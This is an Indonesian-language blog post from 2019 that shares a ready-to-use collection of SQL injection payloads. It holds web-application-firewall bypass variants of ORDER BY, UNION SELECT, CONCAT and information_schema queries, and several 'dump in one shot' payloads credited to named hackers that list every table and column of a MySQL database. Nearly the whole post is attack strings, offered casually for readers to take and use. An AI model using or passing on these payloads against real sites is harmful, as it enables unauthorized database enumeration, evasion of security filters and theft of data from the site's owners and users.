SQL Injection - Kumpulan DIOS dan Bypass Waff (Lengkap)
Monday, November 4, 2019
Edit
Gw bakalan share nih kumpulan DIOS Waff Bypass yang sering gw pake, daripada gw pake sendiri mending gw sebar, iya kan baby:v
Langsung aja ambil cuy:v
Order by :
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
Union Select :
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Information_shema.tables :
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
Concat :
CoNcAt()
concat()
CON%08CAT()
unhex(hex(/*!50000concat*/(table_name)))
Group_Concat :
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
convert(group_concat(/*!table_name*/)+using+ascii)
DIOS by Profexer a Russian Hacker:
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
DIOS by Dr.Z3ro:
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
DIOS by M@dBlood
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Shortest DIOS
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Udah segitu aja ya tmen temen:D, besok klo ada waktu gw tambah'in lagi DIOS nya.
Trima kasih untuk yang udah membaca.
Happy play security code